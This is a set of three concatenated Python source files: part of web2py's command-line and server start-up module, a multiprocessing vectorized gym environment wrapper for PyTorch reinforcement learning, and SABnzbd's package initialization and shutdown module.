parser.add_option('-A', '--args', action='store', dest='args', default=None, help=msg) parser.add_option('--no-banner', action='store_true', default=False, dest='nobanner', help='Do not print header banner') msg = ('listen on multiple addresses: ' '"ip1:port1:key1:cert1:ca_cert1;ip2:port2:key2:cert2:ca_cert2;..." ' '(:key:cert:ca_cert optional; no spaces; IPv6 addresses must be in ' 'square [] brackets)') parser.add_option('--interfaces', action='store', dest='interfaces', default=None, help=msg) msg = 'runs web2py tests' parser.add_option('--run_system_tests', action='store_true', dest='run_system_tests', default=False, help=msg) msg = ('adds coverage reporting (needs --run_system_tests), ' 'python 2.7 and the coverage module installed. 
' 'You can alter the default path setting the environmental ' 'var "COVERAGE_PROCESS_START". ' 'By default it takes gluon/tests/coverage.ini') parser.add_option('--with_coverage', action='store_true', dest='with_coverage', default=False, help=msg) if '-A' in sys.argv: k = sys.argv.index('-A') elif '--args' in sys.argv: k = sys.argv.index('--args') else: k = len(sys.argv) sys.argv, other_args = sys.argv[:k], sys.argv[k + 1:] (options, args) = parser.parse_args() options.args = [options.run] + other_args global_settings.cmd_options = options global_settings.cmd_args = args try: options.ips = list(set( # no duplicates [addrinfo[4][0] for addrinfo in getipaddrinfo(socket.getfqdn()) if not is_loopback_ip_address(addrinfo=addrinfo)])) except socket.gaierror: options.ips = [] if options.run_system_tests: run_system_tests(options) if options.quiet: capture = cStringIO.StringIO() sys.stdout = capture logger.setLevel(logging.CRITICAL + 1) else: logger.setLevel(options.debuglevel) if options.config[-3:] == '.py': options.config = options.config[:-3] if options.cronjob: global_settings.cronjob = True # tell the world options.plain = True # cronjobs use a plain shell options.nobanner = True options.nogui = True options.folder = os.path.abspath(options.folder) # accept --interfaces in the form # "ip1:port1:key1:cert1:ca_cert1;[ip2]:port2;ip3:port3:key3:cert3" # (no spaces; optional key:cert indicate SSL) if isinstance(options.interfaces, str): interfaces = options.interfaces.split(';') options.interfaces = [] for interface in interfaces: if interface.startswith('['): # IPv6 ip, if_remainder = interface.split(']', 1) ip = ip[1:] if_remainder = if_remainder[1:].split(':') if_remainder[0] = int(if_remainder[0]) # numeric port options.interfaces.append(tuple([ip] + if_remainder)) else: # IPv4 interface = interface.split(':') interface[1] = int(interface[1]) # numeric port options.interfaces.append(tuple(interface)) # accepts --scheduler in the form # "app:group1,group2,app2:group1" scheduler = [] options.scheduler_groups = None if isinstance(options.scheduler, str): if ':' in options.scheduler: for opt in options.scheduler.split(','): scheduler.append(opt.split(':')) options.scheduler = ','.join([app[0] for app in scheduler]) options.scheduler_groups = scheduler if options.numthreads is not None and options.minthreads is None: options.minthreads = options.numthreads # legacy create_welcome_w2p() if not options.cronjob: # If we have the applications package or if we should upgrade if not os.path.exists('applications/__init__.py'): write_file('applications/__init__.py', '') return options, args def check_existent_app(options, appname): if os.path.isdir(os.path.join(options.folder, 'applications', appname)): return True def get_code_for_scheduler(app, options): if len(app) == 1 or app[1] is None: code = "from gluon import current;current._scheduler.loop()" else: code = "from gluon import current;current._scheduler.group_names = ['%s'];" code += "current._scheduler.loop()" code = code % ("','".join(app[1:])) app_ = app[0] if not check_existent_app(options, app_): print "Application '%s' doesn't exist, skipping" % app_ return None, None return app_, code def start_schedulers(options): try: from multiprocessing import Process except: sys.stderr.write('Sorry, -K only supported for python 2.6-2.7\n') return processes = [] apps = [(app.strip(), None) for app in options.scheduler.split(',')] if options.scheduler_groups: apps = options.scheduler_groups code = "from gluon import current;current._scheduler.loop()" 
logging.getLogger().setLevel(options.debuglevel) if len(apps) == 1 and not options.with_scheduler: app_, code = get_code_for_scheduler(apps[0], options) if not app_: return print 'starting single-scheduler for "%s"...' % app_ run(app_, True, True, None, False, code) return for app in apps: app_, code = get_code_for_scheduler(app, options) if not app_: continue print 'starting scheduler for "%s"...' % app_ args = (app_, True, True, None, False, code) p = Process(target=run, args=args) processes.append(p) print "Currently running %s scheduler processes" % (len(processes)) p.start() ##to avoid bashing the db at the same time time.sleep(0.7) print "Processes started" for p in processes: try: p.join() except (KeyboardInterrupt, SystemExit): print "Processes stopped" except: p.terminate() p.join() def start(cron=True): """ Start server """ # ## get command line arguments (options, args) = console() if not options.nobanner: print ProgramName print ProgramAuthor print ProgramVersion from dal import DRIVERS if not options.nobanner: print 'Database drivers available: %s' % ', '.join(DRIVERS) # ## if -L load options from options.config file if options.config: try: options2 = __import__(options.config, {}, {}, '') except Exception: try: # Jython doesn't like the extra stuff options2 = __import__(options.config) except Exception: print 'Cannot import config file [%s]' % options.config sys.exit(1) for key in dir(options2): if hasattr(options, key): setattr(options, key, getattr(options2, key)) logfile0 = os.path.join('extras','examples','logging.example.conf') if not os.path.exists('logging.conf') and os.path.exists(logfile0): import shutil sys.stdout.write("Copying logging.conf.example to logging.conf ... ") shutil.copyfile('logging.example.conf', logfile0) sys.stdout.write("OK\n") # ## if -T run doctests (no cron) if hasattr(options, 'test') and options.test: test(options.test, verbose=options.verbose) return # ## if -S start interactive shell (also no cron) if options.shell: if not options.args is None: sys.argv[:] = options.args run(options.shell, plain=options.plain, bpython=options.bpython, import_models=options.import_models, startfile=options.run, cronjob=options.cronjob) return # ## if -C start cron run (extcron) and exit # ## -K specifies optional apps list (overloading scheduler) if options.extcron: logger.debug('Starting extcron...') global_settings.web2py_crontype = 'external' if options.scheduler: # -K apps = [app.strip() for app in options.scheduler.split( ',') if check_existent_app(options, app.strip())] else: apps = None extcron = newcron.extcron(options.folder, apps=apps) extcron.start() extcron.join() return # ## if -K if options.scheduler and not options.with_scheduler: try: start_schedulers(options) except KeyboardInterrupt: pass return # ## if -H cron is enabled in this *process* # ## if --softcron use softcron # ## use hardcron in all other cases if cron and options.runcron and options.softcron: print 'Using softcron (but this is not very efficient)' global_settings.web2py_crontype = 'soft' elif cron and options.runcron: logger.debug('Starting hardcron...') global_settings.web2py_crontype = 'hard' newcron.hardcron(options.folder).start() # ## if no password provided and havetk start Tk interface # ## or start interface if we want to put in taskbar (system tray) try: options.taskbar except: options.taskbar = False if options.taskbar and os.name != 'nt': print 'Error: taskbar not supported on this platform' sys.exit(1) root = None if not options.nogui: try: import Tkinter havetk = 
True except ImportError: logger.warn( 'GUI not available because Tk library is not installed') havetk = False options.nogui = True if options.password == '<ask>' and havetk or options.taskbar and havetk: try: root = Tkinter.Tk() except: pass if root: root.focus_force() # Mac OS X - make the GUI window rise to the top if os.path.exists("/usr/bin/osascript"): applescript = """ tell application "System Events" set proc to first process whose unix id is %d set frontmost of proc to true end tell """ % (os.getpid()) os.system("/usr/bin/osascript -e '%s'" % applescript) if not options.quiet: presentation(root) master = web2pyDialog(root, options) signal.signal(signal.SIGTERM, lambda a, b: master.quit()) try: root.mainloop() except: master.quit() sys.exit() # ## if no tk and no password, ask for a password if not root and options.password == '<ask>': options.password = getpass.getpass('choose a password:') if not options.password and not options.nobanner: print 'no password, no admin interface' # ##-X (if no tk, the widget takes care of it himself) if not root and options.scheduler and options.with_scheduler: t = threading.Thread(target=start_schedulers, args=(options,)) t.start() # ## start server # Use first interface IP and port if interfaces specified, since the # interfaces option overrides the IP (and related) options. if not options.interfaces: (ip, port) = (options.ip, int(options.port)) else: first_if = options.interfaces[0] (ip, port) = first_if[0], first_if[1] # Check for non default value for ssl inputs if (len(options.ssl_certificate) > 0) or (len(options.ssl_private_key) > 0): proto = 'https' else: proto = 'http' url = get_url(ip, proto=proto, port=port) if not options.nobanner: print 'please visit:' print '\t', url print 'use "kill -SIGTERM %i" to shutdown the web2py server' % os.getpid() # enhance linecache.getline (used by debugger) to look at the source file # if the line was not found (under py2exe & when file was modified) import linecache py2exe_getline = linecache.getline def getline(filename, lineno, *args, **kwargs): line = py2exe_getline(filename, lineno, *args, **kwargs) if not line: try: f = open(filename, "r") try: for i, line in enumerate(f): if lineno == i + 1: break else: line = None finally: f.close() except (IOError, OSError): line = None return line linecache.getline = getline server = main.HttpServer(ip=ip, port=port, password=options.password, pid_filename=options.pid_filename, log_filename=options.log_filename, profiler_dir=options.profiler_dir, ssl_certificate=options.ssl_certificate, ssl_private_key=options.ssl_private_key, ssl_ca_certificate=options.ssl_ca_certificate, min_threads=options.minthreads, max_threads=options.maxthreads, server_name=options.server_name, request_queue_size=options.request_queue_size, timeout=options.timeout, socket_timeout=options.socket_timeout, shutdown_timeout=options.shutdown_timeout, path=options.folder, interfaces=options.interfaces) try: server.start() except KeyboardInterrupt: server.stop() try: t.join() except: pass logging.shutdown()
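# --- Editor's note (not part of the original file) -----------------------------
# A few worked examples of the get_url() helper defined near the top of this
# file, which normalizes host, proto and port before the GUI and the console
# banner print the server URL. Shown as a standalone snippet: the import path
# is an assumption (web2py ships this module as gluon/widget.py) and the hosts
# and ports are arbitrary illustrations.
from gluon.widget import get_url

assert get_url('0.0.0.0', port=8000) == 'http://127.0.0.1:8000/'        # 0.0.0.0 rewritten for browsers
assert get_url('::1', proto='https', port=443) == 'https://[::1]:443/'  # IPv6 hosts get bracketed
assert get_url('example.com', path='/admin', port=80) == 'http://example.com/admin'  # default port omitted
# -------------------------------------------------------------------------------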
multiprocessing_env.py
# This code is from openai baseline # https://github.com/openai/baselines/tree/master/baselines/common/vec_env import numpy as np from multiprocessing import Process, Pipe from gym import spaces def worker(remote, parent_remote, env_fn_wrapper): parent_remote.close() env = env_fn_wrapper.x() while True: cmd, data = remote.recv() if cmd == 'step': ob, reward, done, info = env.step(data) if done: ob = env.reset() remote.send((ob, reward, done, info)) elif cmd == 'reset': ob = env.reset() remote.send(ob) elif cmd == 'reset_task': ob = env.reset_task() remote.send(ob) elif cmd == 'close': remote.close() break elif cmd == 'get_spaces': remote.send((env.observation_space, env.action_space)) else: raise NotImplementedError class VecEnv(object): """ An abstract asynchronous, vectorized environment. """ def __init__(self, num_envs, observation_space, action_space): self.num_envs = num_envs self.observation_space = observation_space self.action_space = action_space def reset(self): """ Reset all the environments and return an array of observations, or a tuple of observation arrays. If step_async is still doing work, that work will be cancelled and step_wait() should not be called until step_async() is invoked again. """ pass def step_async(self, actions): """ Tell all the environments to start taking a step with the given actions. Call step_wait() to get the results of the step. You should not call this if a step_async run is already pending. """ pass def step_wait(self): """ Wait for the step taken with step_async(). Returns (obs, rews, dones, infos): - obs: an array of observations, or a tuple of arrays of observations. - rews: an array of rewards - dones: an array of "episode done" booleans - infos: a sequence of info objects """ pass def close(self): """ Clean up the environments' resources. 
""" pass def step(self, actions): self.step_async(actions) return self.step_wait() class CloudpickleWrapper(object): """ Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle) """ def __init__(self, x): self.x = x def __getstate__(self): import cloudpickle return cloudpickle.dumps(self.x) def __setstate__(self, ob): import pickle self.x = pickle.loads(ob) class SubprocVecEnv(VecEnv): def __init__(self, env_fns, spaces=None): """ envs: list of gym environments to run in subprocesses """ self.waiting = False self.closed = False nenvs = len(env_fns) self.nenvs = nenvs self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)]) self.ps = [Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn))) for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)] for p in self.ps: p.daemon = True # if the main process crashes, we should not cause things to hang p.start() for remote in self.work_remotes: remote.close() self.remotes[0].send(('get_spaces', None)) observation_space, action_space = self.remotes[0].recv() VecEnv.__init__(self, len(env_fns), observation_space, action_space) def step_async(self, actions): for remote, action in zip(self.remotes, actions): remote.send(('step', action)) self.waiting = True def step_wait(self): results = [remote.recv() for remote in self.remotes] self.waiting = False obs, rews, dones, infos = zip(*results) return np.stack(obs), np.stack(rews), np.stack(dones), infos def reset(self): for remote in self.remotes: remote.send(('reset', None)) return np.stack([remote.recv() for remote in self.remotes]) def reset_task(self): for remote in self.remotes: remote.send(('reset_task', None)) return np.stack([remote.recv() for remote in self.remotes]) def close(self): if self.closed: return if self.waiting: for remote in self.remotes: remote.recv() for remote in self.remotes: remote.send(('close', None)) for p in self.ps: p.join() self.closed = True def __len__(self): return self.nenvs class VecEnvWrapper(VecEnv): def __init__(self, venv, observation_space=None, action_space=None): self.venv = venv VecEnv.__init__(self, num_envs=venv.num_envs, observation_space=observation_space or venv.observation_space, action_space=action_space or venv.action_space) def step_async(self, actions): self.venv.step_async(actions) def reset(self): pass def step_wait(self): pass def close(self): return self.venv.close() def render(self): self.venv.render() class VecFrameStack(VecEnvWrapper): """ Vectorized environment base class """ def __init__(self, venv, num_stacks): self.venv = venv self.num_stacks = num_stacks wos = venv.observation_space # wrapped ob space low = np.repeat(wos.low, self.num_stacks, axis=0) high = np.repeat(wos.high, self.num_stacks, axis=0) self.observations = np.zeros((venv.num_envs,) + low.shape, low.dtype) observation_space = spaces.Box(low=low, high=high, dtype=venv.observation_space.dtype) VecEnvWrapper.__init__(self, venv, observation_space=observation_space) def step_wait(self): shape = self.observation_space.shape obs, rews, news, infos = self.venv.step_wait() self.observations[:, :-shape[0]] = self.observations[:, shape[0]:] for (i, new) in enumerate(news): if new: self.observations[i] = 0 self.observations[:, -shape[0]:] = obs return self.observations, rews, news, infos def reset(self): """ Reset all environments """ shape = self.observation_space.shape obs = self.venv.reset() self.observations[...] 
= 0 self.observations[:, -shape[0]:] = obs return self.observations def close(self): self.venv.close() import torch import gym # Derived from # https://github.com/openai/baselines/blob/master/baselines/common/vec_env/vec_frame_stack.py class VecPyTorchFrameStack(VecEnvWrapper): def __init__(self, venv, nstack, device=None): self.venv = venv self.nstack = nstack wos = venv.observation_space # wrapped ob space self.shape_dim0 = wos.shape[0] low = np.repeat(wos.low, self.nstack, axis=0) high = np.repeat(wos.high, self.nstack, axis=0) if device is None: device = torch.device('cpu') self.stacked_obs = torch.zeros((venv.num_envs,) + low.shape).to(device) observation_space = gym.spaces.Box( low=low, high=high, dtype=venv.observation_space.dtype) VecEnvWrapper.__init__(self, venv, observation_space=observation_space) def step_wait(self): obs, rews, news, infos = self.venv.step_wait() self.stacked_obs[:, :-self.shape_dim0] = \ self.stacked_obs[:, self.shape_dim0:] for (i, new) in enumerate(news): if new: self.stacked_obs[i] = 0 self.stacked_obs[:, -self.shape_dim0:] = obs return self.stacked_obs, rews, news, infos def reset(self): obs = self.venv.reset() self.stacked_obs.zero_() self.stacked_obs[:, -self.shape_dim0:] = obs return self.stacked_obs def close(self): self.venv.close() class VecPyTorch(VecEnvWrapper): def __init__(self, venv, device): """Return only every `skip`-th frame""" super(VecPyTorch, self).__init__(venv) self.device = device # TODO: Fix data types def reset(self): obs = self.venv.reset() obs = torch.from_numpy(obs).float().to(self.device) return obs def step_async(self, actions): actions = actions.squeeze(1).cpu().numpy() self.venv.step_async(actions) def step_wait(self): obs, reward, done, info = self.venv.step_wait() obs = torch.from_numpy(obs).float().to(self.device) reward = torch.from_numpy(reward).unsqueeze(dim=1).float() return obs, reward, done, info
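# --- Editor's sketch (not part of the original file) ---------------------------
# The wrappers above are meant to be composed: SubprocVecEnv runs the gym
# environments in worker processes, and VecPyTorch converts the stacked numpy
# arrays into torch tensors. A minimal usage sketch under the same old-style
# gym API this file assumes (env.seed(), 4-tuple step returns); the env id,
# seeding scheme and number of workers are arbitrary examples, and gym/torch
# are already imported earlier in this module.
def make_env(env_id, seed):
    def _thunk():
        env = gym.make(env_id)
        env.seed(seed)
        return env
    return _thunk


if __name__ == '__main__':
    num_envs = 4
    envs = SubprocVecEnv([make_env('CartPole-v1', seed=i) for i in range(num_envs)])
    envs = VecPyTorch(envs, device=torch.device('cpu'))   # numpy -> torch tensors
    # envs = VecPyTorchFrameStack(envs, nstack=4)         # optional frame stacking
    obs = envs.reset()                                    # tensor of shape (num_envs, obs_dim)
    actions = torch.zeros(num_envs, 1, dtype=torch.long)  # VecPyTorch squeezes dim 1 before stepping
    obs, rewards, dones, infos = envs.step(actions)
    envs.close()

# The __main__ guard matters here: with spawn-based multiprocessing start
# methods the module is re-imported in each worker process, and unguarded
# top-level code would try to create the subprocess pool recursively.
# -------------------------------------------------------------------------------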
__init__.py
#!/usr/bin/python3 -OO # Copyright 2007-2021 The SABnzbd-Team <[email protected]> # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. import os import logging import datetime import tempfile import pickle import ctypes.util import gzip import time import socket import cherrypy import cherrypy._cpreqbody import platform import sys import ssl from threading import Lock, Thread, Condition from typing import Any, AnyStr, Optional, Union ############################################################################## # Determine platform flags ############################################################################## WIN32 = DARWIN = FOUNDATION = WIN64 = DOCKER = False KERNEL32 = LIBC = MACOSLIBC = None if os.name == "nt": WIN32 = True from sabnzbd.utils.apireg import del_connection_info try: KERNEL32 = ctypes.windll.LoadLibrary("Kernel32.dll") except: pass elif os.name == "posix": ORG_UMASK = os.umask(18) os.umask(ORG_UMASK) # Check if running in a Docker container try: with open("/proc/1/cgroup", "rt") as ifh: DOCKER = ":/docker/" in ifh.read() except: pass # See if we have the GNU glibc malloc_trim() memory release function try: LIBC = ctypes.CDLL("libc.so.6") LIBC.malloc_trim(0) # try the malloc_trim() call, which is a GNU extension except: # No malloc_trim(), probably because no glibc LIBC = None pass # Parse macOS version numbers if platform.system().lower() == "darwin": DARWIN = True # 12 = Sierra, 11 = ElCaptain, 10 = Yosemite, 9 = Mavericks, 8 = MountainLion DARWIN_VERSION = int(platform.mac_ver()[0].split(".")[1]) MACOSLIBC = ctypes.CDLL(ctypes.util.find_library("c"), use_errno=True) # the MacOS C library try: import Foundation import sabnzbd.utils.sleepless as sleepless FOUNDATION = True except: pass # Imported to be referenced from other files directly from sabnzbd.version import __version__, __baseline__ # Now we can import safely import sabnzbd.misc as misc import sabnzbd.filesystem as filesystem import sabnzbd.powersup as powersup import sabnzbd.rss as rss import sabnzbd.emailer as emailer import sabnzbd.encoding as encoding import sabnzbd.config as config import sabnzbd.cfg as cfg import sabnzbd.database import sabnzbd.lang as lang import sabnzbd.nzbparser as nzbparser import sabnzbd.nzbstuff import sabnzbd.getipaddress import sabnzbd.newsunpack import sabnzbd.par2file import sabnzbd.api import sabnzbd.interface import sabnzbd.zconfig import sabnzbd.directunpacker as directunpacker import sabnzbd.dirscanner import sabnzbd.urlgrabber import sabnzbd.nzbqueue import sabnzbd.postproc import sabnzbd.downloader import sabnzbd.decoder import sabnzbd.assembler import sabnzbd.rating import sabnzbd.articlecache import sabnzbd.bpsmeter import sabnzbd.scheduler as scheduler import sabnzbd.notifier as notifier from sabnzbd.decorators import synchronized from sabnzbd.constants import ( DEFAULT_PRIORITY, VALID_ARCHIVES, REPAIR_REQUEST, ) import 
sabnzbd.utils.ssdp # Storage for the threads, variables are filled during initialization ArticleCache: sabnzbd.articlecache.ArticleCache Rating: sabnzbd.rating.Rating Assembler: sabnzbd.assembler.Assembler Decoder: sabnzbd.decoder.Decoder Downloader: sabnzbd.downloader.Downloader PostProcessor: sabnzbd.postproc.PostProcessor NzbQueue: sabnzbd.nzbqueue.NzbQueue URLGrabber: sabnzbd.urlgrabber.URLGrabber DirScanner: sabnzbd.dirscanner.DirScanner BPSMeter: sabnzbd.bpsmeter.BPSMeter RSSReader: sabnzbd.rss.RSSReader Scheduler: sabnzbd.scheduler.Scheduler # Regular constants START = datetime.datetime.now() MY_NAME = None MY_FULLNAME = None RESTART_ARGS = [] NEW_VERSION = (None, None) DIR_HOME = None DIR_LCLDATA = None DIR_PROG = None DIR_INTERFACES = None DIR_LANGUAGE = None DIR_PID = None QUEUECOMPLETE = None # stores the nice name of the action QUEUECOMPLETEACTION = None # stores the name of the function to be called QUEUECOMPLETEARG = None # stores an extra arguments that need to be passed DAEMON = None LINUX_POWER = powersup.HAVE_DBUS LOGFILE = None WEBLOGFILE = None GUIHANDLER = None LOG_ALL = False AMBI_LOCALHOST = False WIN_SERVICE = None # Instance of our Win32 Service Class BROWSER_URL = None CERTIFICATE_VALIDATION = True NO_DOWNLOADING = False # When essentials are missing (SABYenc/par2/unrar) WEB_DIR = None WEB_DIR_CONFIG = None WIZARD_DIR = None WEB_COLOR = None SABSTOP = False RESTART_REQ = False PAUSED_ALL = False TRIGGER_RESTART = False # To trigger restart for Scheduler, WinService and Mac WINTRAY = None # Thread for the Windows SysTray icon WEBUI_READY = False EXTERNAL_IPV6 = False LAST_HISTORY_UPDATE = 1 # Condition used to handle the main loop in SABnzbd.py SABSTOP_CONDITION = Condition(Lock()) # Performance measure for dashboard PYSTONE_SCORE = 0 DOWNLOAD_DIR_SPEED = 0 COMPLETE_DIR_SPEED = 0 INTERNET_BANDWIDTH = 0 # Rendering of original command line arguments in Config CMDLINE = " ".join(['"%s"' % arg for arg in sys.argv]) __INITIALIZED__ = False __SHUTTING_DOWN__ = False ############################################################################## # Signal Handler ############################################################################## def sig_handler(signum=None, frame=None): if sabnzbd.WIN32 and signum is not None and DAEMON and signum == 5: # Ignore the "logoff" event when running as a Win32 daemon return True if signum is not None: logging.warning(T("Signal %s caught, saving and exiting..."), signum) sabnzbd.shutdown_program() ############################################################################## # Initializing ############################################################################## INIT_LOCK = Lock() def get_db_connection(thread_index=0): # Create a connection and store it in the current thread if not (hasattr(cherrypy.thread_data, "history_db") and cherrypy.thread_data.history_db): cherrypy.thread_data.history_db = sabnzbd.database.HistoryDB() return cherrypy.thread_data.history_db @synchronized(INIT_LOCK) def initialize(pause_downloader=False, clean_up=False, repair=0): if sabnzbd.__INITIALIZED__: return False sabnzbd.__SHUTTING_DOWN__ = False # Set global database connection for Web-UI threads cherrypy.engine.subscribe("start_thread", get_db_connection) # Paused? 
pause_downloader = pause_downloader or cfg.start_paused() # Clean-up, if requested if clean_up: # New admin folder filesystem.remove_all(cfg.admin_dir.get_path(), "*.sab") # Optionally wait for "incomplete" to become online if cfg.wait_for_dfolder(): wait_for_download_folder() else: cfg.download_dir.set(cfg.download_dir(), create=True) cfg.download_dir.set_create(True) # Set access rights for "incomplete" base folder filesystem.set_permissions(cfg.download_dir.get_path(), recursive=False) # If dirscan_dir cannot be created, set a proper value anyway. # Maybe it's a network path that's temporarily missing. path = cfg.dirscan_dir.get_path() if not os.path.exists(path): filesystem.create_real_path(cfg.dirscan_dir.ident(), "", path, False) # Set call backs for Config items cfg.cache_limit.callback(new_limit) cfg.cherryhost.callback(guard_restart) cfg.cherryport.callback(guard_restart) cfg.web_dir.callback(guard_restart) cfg.web_color.callback(guard_restart) cfg.username.callback(guard_restart) cfg.password.callback(guard_restart) cfg.log_dir.callback(guard_restart) cfg.https_port.callback(guard_restart) cfg.https_cert.callback(guard_restart) cfg.https_key.callback(guard_restart) cfg.enable_https.callback(guard_restart) cfg.top_only.callback(guard_top_only) cfg.pause_on_post_processing.callback(guard_pause_on_pp) cfg.quota_size.callback(guard_quota_size) cfg.quota_day.callback(guard_quota_dp) cfg.quota_period.callback(guard_quota_dp) cfg.language.callback(guard_language) cfg.enable_https_verification.callback(guard_https_ver) guard_https_ver() check_incomplete_vs_complete() # Set language files lang.set_locale_info("SABnzbd", DIR_LANGUAGE) lang.set_language(cfg.language()) sabnzbd.api.clear_trans_cache() # Set end-of-queue action sabnzbd.change_queue_complete_action(cfg.queue_complete(), new=False) # Convert auto-sort if cfg.auto_sort() == "0": cfg.auto_sort.set("") elif cfg.auto_sort() == "1": cfg.auto_sort.set("avg_age asc") # Add hostname to the whitelist if not cfg.host_whitelist(): cfg.host_whitelist.set(socket.gethostname()) # Do repair if requested if check_repair_request(): repair = 2 pause_downloader = True # Initialize threads sabnzbd.ArticleCache = sabnzbd.articlecache.ArticleCache() sabnzbd.BPSMeter = sabnzbd.bpsmeter.BPSMeter() sabnzbd.NzbQueue = sabnzbd.nzbqueue.NzbQueue() sabnzbd.Downloader = sabnzbd.downloader.Downloader(sabnzbd.BPSMeter.read() or pause_downloader) sabnzbd.Decoder = sabnzbd.decoder.Decoder() sabnzbd.Assembler = sabnzbd.assembler.Assembler() sabnzbd.PostProcessor = sabnzbd.postproc.PostProcessor() sabnzbd.DirScanner = sabnzbd.dirscanner.DirScanner() sabnzbd.Rating = sabnzbd.rating.Rating() sabnzbd.URLGrabber = sabnzbd.urlgrabber.URLGrabber() sabnzbd.RSSReader = sabnzbd.rss.RSSReader() sabnzbd.Scheduler = sabnzbd.scheduler.Scheduler() # Run startup tasks sabnzbd.NzbQueue.read_queue(repair) sabnzbd.Scheduler.analyse(pause_downloader) # Set cache limit for new users if not cfg.cache_limit(): cfg.cache_limit.set(misc.get_cache_limit()) sabnzbd.ArticleCache.new_limit(cfg.cache_limit.get_int()) logging.info("All processes started") sabnzbd.RESTART_REQ = False sabnzbd.__INITIALIZED__ = True @synchronized(INIT_LOCK) def start(): if sabnzbd.__INITIALIZED__: logging.debug("Starting postprocessor") sabnzbd.PostProcessor.start() logging.debug("Starting assembler") sabnzbd.Assembler.start() logging.debug("Starting downloader") sabnzbd.Downloader.start() logging.debug("Starting decoders") sabnzbd.Decoder.start() logging.debug("Starting scheduler") sabnzbd.Scheduler.start() 
logging.debug("Starting dirscanner") sabnzbd.DirScanner.start() logging.debug("Starting rating") sabnzbd.Rating.start() logging.debug("Starting urlgrabber") sabnzbd.URLGrabber.start() @synchronized(INIT_LOCK) def halt(): if sabnzbd.__INITIALIZED__: logging.info("SABnzbd shutting down...") sabnzbd.__SHUTTING_DOWN__ = True # Stop the windows tray icon if sabnzbd.WINTRAY: sabnzbd.WINTRAY.stop() # Remove registry information if sabnzbd.WIN32: del_connection_info() sabnzbd.zconfig.remove_server() sabnzbd.utils.ssdp.stop_ssdp() sabnzbd.directunpacker.abort_all() logging.debug("Stopping RSSReader") sabnzbd.RSSReader.stop() logging.debug("Stopping URLGrabber") sabnzbd.URLGrabber.stop() try: sabnzbd.URLGrabber.join() except: pass logging.debug("Stopping rating") sabnzbd.Rating.stop() try: sabnzbd.Rating.join() except: pass logging.debug("Stopping dirscanner") sabnzbd.DirScanner.stop() try: sabnzbd.DirScanner.join() except: pass logging.debug("Stopping downloader") sabnzbd.Downloader.stop() try: sabnzbd.Downloader.join() except: pass # Decoder handles join gracefully logging.debug("Stopping decoders") sabnzbd.Decoder.stop() sabnzbd.Decoder.join() logging.debug("Stopping assembler") sabnzbd.Assembler.stop() try: sabnzbd.Assembler.join() except: pass logging.debug("Stopping postprocessor") sabnzbd.PostProcessor.stop() try: sabnzbd.PostProcessor.join() except: pass # Save State try: save_state() except: logging.error(T("Fatal error at saving state"), exc_info=True) # The Scheduler cannot be stopped when the stop was scheduled. # Since all warm-restarts have been removed, it's not longer # needed to stop the scheduler. # We must tell the scheduler to deactivate. logging.debug("Terminating scheduler") sabnzbd.Scheduler.abort() logging.info("All processes stopped") sabnzbd.__INITIALIZED__ = False def notify_shutdown_loop(): """Trigger the main loop to wake up""" with sabnzbd.SABSTOP_CONDITION: sabnzbd.SABSTOP_CONDITION.notify() def shutdown_program(): """Stop program after halting and saving""" if not sabnzbd.SABSTOP: logging.info("[%s] Performing SABnzbd shutdown", misc.caller_name()) sabnzbd.halt() cherrypy.engine.exit() sabnzbd.SABSTOP = True notify_shutdown_loop() def trigger_restart(timeout=None): """Trigger a restart by setting a flag an shutting down CP""" # Sometimes we need to wait a bit to send good-bye to the browser if timeout: time.sleep(timeout) # Set the flag and wake up the main loop sabnzbd.TRIGGER_RESTART = True notify_shutdown_loop() ############################################################################## # Misc Wrappers ############################################################################## def new_limit(): """Callback for article cache changes""" sabnzbd.ArticleCache.new_limit(cfg.cache_limit.get_int()) def guard_restart(): """Callback for config options requiring a restart""" sabnzbd.RESTART_REQ = True def guard_top_only(): """Callback for change of top_only option""" sabnzbd.NzbQueue.set_top_only(cfg.top_only()) def guard_pause_on_pp(): """Callback for change of pause-download-on-pp""" if cfg.pause_on_post_processing(): pass # Not safe to idle downloader, because we don't know # if post-processing is active now else: sabnzbd.Downloader.resume_from_postproc() def guard_quota_size(): """Callback for change of quota_size""" sabnzbd.BPSMeter.change_quota() def guard_quota_dp(): """Callback for change of quota_day or quota_period""" sabnzbd.Scheduler.restart() def guard_language(): """Callback for change of the interface language""" sabnzbd.lang.set_language(cfg.language()) 
sabnzbd.api.clear_trans_cache() def set_https_verification(value): """Set HTTPS-verification state while returning current setting False = disable verification """ prev = ssl._create_default_https_context == ssl.create_default_context if value: ssl._create_default_https_context = ssl.create_default_context else: ssl._create_default_https_context = ssl._create_unverified_context return prev def guard_https_ver(): """Callback for change of https verification""" set_https_verification(cfg.enable_https_verification()) def add_url(url, pp=None, script=None, cat=None, priority=None, nzbname=None, password=None): """Add NZB based on a URL, attributes optional""" if "http" not in url: return if not pp or pp == "-1": pp = None if script and script.lower() == "default": script = None if cat and cat.lower() == "default": cat = None logging.info("Fetching %s", url) # Add feed name if it came from RSS msg = T("Trying to fetch NZB from %s") % url if nzbname: msg = "%s - %s" % (nzbname, msg) # Generate the placeholder future_nzo = sabnzbd.NzbQueue.generate_future(msg, pp, script, cat, url=url, priority=priority, nzbname=nzbname) # Set password if not future_nzo.password: future_nzo.password = password # Get it! sabnzbd.URLGrabber.add(url, future_nzo) return future_nzo.nzo_id def save_state(): """Save all internal bookkeeping to disk""" config.save_config() sabnzbd.ArticleCache.flush_articles() sabnzbd.NzbQueue.save() sabnzbd.BPSMeter.save() sabnzbd.Rating.save() sabnzbd.DirScanner.save() sabnzbd.PostProcessor.save() sabnzbd.RSSReader.save() def pause_all(): """Pause all activities than cause disk access""" sabnzbd.PAUSED_ALL = True sabnzbd.Downloader.pause() logging.debug("PAUSED_ALL active") def unpause_all(): """Resume all activities""" sabnzbd.PAUSED_ALL = False sabnzbd.Downloader.resume() 